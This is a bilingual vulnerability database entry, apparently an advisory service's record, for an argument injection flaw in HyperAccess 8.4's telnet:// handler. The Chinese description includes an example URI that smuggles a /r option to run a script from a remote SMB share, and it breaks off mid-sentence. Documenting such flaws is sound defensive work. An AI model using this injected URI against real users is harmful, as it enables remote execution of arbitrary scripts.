Vulnerability Information
Although we use advanced large model technology, its output may still contain inaccurate or outdated information.Shenlong tries to ensure data accuracy, but please verify and judge based on the actual situation.
Vulnerability Title
N/A
Vulnerability Description
Argument injection vulnerability in HyperAccess 8.4 allows user-assisted remote attackers to execute arbitrary vbscript and commands via the /r option in a telnet:// URI, which is configured to use hawin32.exe.
CVSS Information
N/A
Vulnerability Type
N/A
Vulnerability Title
Hyper Access Telnet URL协议恶意脚本任意vbscript代码执行漏洞
Vulnerability Description
HyperACCESS是HyperTerminal的官方升级,可为用户提供终端通讯解决方案。 HyperAccess中存在参数注入漏洞,以要求URL协议处理telnet:// URL控制程序。HyperAccess会接受/r为命令行参数指定将要运行的脚本文件,可使用类似于以下的URL通过Internet Explorer将该命令传送给URL:telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt ,如果SERVER为包含有恶意脚本的SMB共享或
CVSS Information
N/A
Vulnerability Type
N/A